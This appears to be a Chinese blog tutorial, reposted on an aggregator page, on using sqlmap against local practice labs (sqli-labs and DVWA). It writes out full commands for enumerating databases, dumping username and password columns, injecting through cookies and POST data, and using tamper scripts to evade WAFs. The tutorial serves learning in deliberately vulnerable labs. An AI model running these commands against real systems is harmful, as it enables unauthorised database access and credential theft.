sql注入——sqlmap的基本使用

其他 2020-02-21 18:50:15 阅读次数: 0

一、以sql labs1为例

1.用sql labs的地址为例,打开cmd,输入python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1

由上图我们可以看到返回的网址是mysql类型的,经过扫描可看到注入类型有以上几种

2.输入:python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --dbs 可查看数据库

3.输入:python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --current-db可查看当前的数据库

4.输入:python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --current-user可查看当前的用户

5.输入:python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security --tables  可指定查看该数据库的所有表

6.输入:python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security -T --users --columns指定查看该数据库中的users表的所有列

7.输入:python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 -D security -T users -C username,password --dump可查看具体数据列的内容

二、利用sqlmap对DVWA低级别进行检测

1.选定DVWA级别是低级别

2.进入sql注入,填1,提交

3.首先需要先借助bp软件进行抓包拿到cookie值

4.将抓包拿到的cookie值复制到cmd中,输入:python sqlmap.py -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=2l919te8na88orp4t3bcshc844",检测出id是存在漏洞的

5.输入:python sqlmap.py -u "http://localhost/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie "security=low; PHPSESSID=2l919te8na88orp4t3bcshc844" --current-db查看当前数据库

三、利用sqlmap对DVWA中级别进行检测(利用POST数据传参)

1.选定DVWA级别是中级别

2.在sql注入中提交数据,并用bp抓包

3.在cmd中用--data指定POST数据,同样用--cookie指定cookie数据,输入:python sqlmap.py -u "http://localhost/DVWA-master/vulnerabilities/sqli/" --data "id=1&Submit=Submit" --cookie "security=medium; PHPSESSID=2l919te8na88orp4t3bcshc844" 检测出该数据是POST数据,id存在漏洞

4.输入:python sqlmap.py -u "http://localhost/DVWA-master/vulnerabilities/sqli/" --data "id=1&Submit=Submit" --cookie "security=medium; PHPSESSID=2l919te8na88orp4t3bcshc844" --current-db查看当前数据库

四、以sql labs20为例介绍cookie注入

1.输入正确的用户名和密码登陆成功后可看到下图:

2.利用bp软件抓包获取ccookie值

3.将地址和cookie写在cmd中:python sqlmap.py -u "http://localhost/sqli-labs-master/Less-20/index.php" --cookie " uname=admin" -p uname --level 5 -v 6

1.输入正确的用户名和密码登陆成功后可看五、以sql labs21为例介绍cookie注入到下图:

2.利用bp软件抓包获取ccookie值

3.将地址和cookie写在cmd中:python sqlmap.py -u "http://localhost/sqli-labs-master/Less-21/index.php" --cookie "uname=admin" -p uname --tamper "base64encode" --level 5 --dbms mysql可看到uname的cookie

六、使用sqlmap进绕过waf机制

sqlmap中的tamper给我们带来了很多防过滤的脚本,非常实用,通过自带的tamper,或者自行编写tamper(路径:安装目录sqlmap\tamper),可以帮助我们绕过waf进行自动化攻击

1.编写一个脚本

2.在cmd中输入:python sqlmap.py -u "http://localhost/sqli-labs-master/Less-25/?id=1" --tamper or2orr --dbs,得到下面的漏洞及所有的数据库

没有如果ru果
发布了38 篇原创文章 · 获赞 21 · 访问量 1944
私信 关注

猜你喜欢

转载自blog.csdn.net/cxrpty/article/details/104268286
今日推荐
国产云输入法——仅华为无云端数据上传安全问题
开源日报 | 工业开源项目OGG 1.0;姐姐,你要和我一起配置火狐吗;苹果AI遥遥落后?Fedora 40
开放签电子签章:停止新增,优化体验,前进更进(五一假期前工作)
开源日报 | 中学生开源前端动画引擎;全球首个Llama3 8B中文版开源模型;联想电脑恐出局;Linus讽刺AI炒作
“百模大战”必有一战 | 2024中国“百模大战”竞争格局分析
最强开源大模型 Llama 3 上架 Gitee AI
周排行
自媒体文章如何提高原创度以及如何检测原创度
开启qq邮箱的smtp服务
Qt程序单次启动(QSingleApplication类)
国外的外包网站
更新IDEA主题——放飞代码风格
cocos2dx 实现搓牌效果(翻牌效果),包括铺平动画
dict和json之间的互相转换
angular的一些思考
. Fibonacci数列是这样定义的: F[0] = 0 F[1] = 1 for each i ≥ 2: F[i] = F[i-1] + F[i-2] 因此,Fibonacci数列就形如:0, 1
洛谷P1064 金明的预算方案
每日归档
更多
2024-04-25(22)
2024-04-24(36)
2024-04-23(26)
2024-04-22(39)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)
2024-04-17(5)
2024-04-16(70)

代码天地 © 2018 codetd.com

境外服务器   最新电视剧2022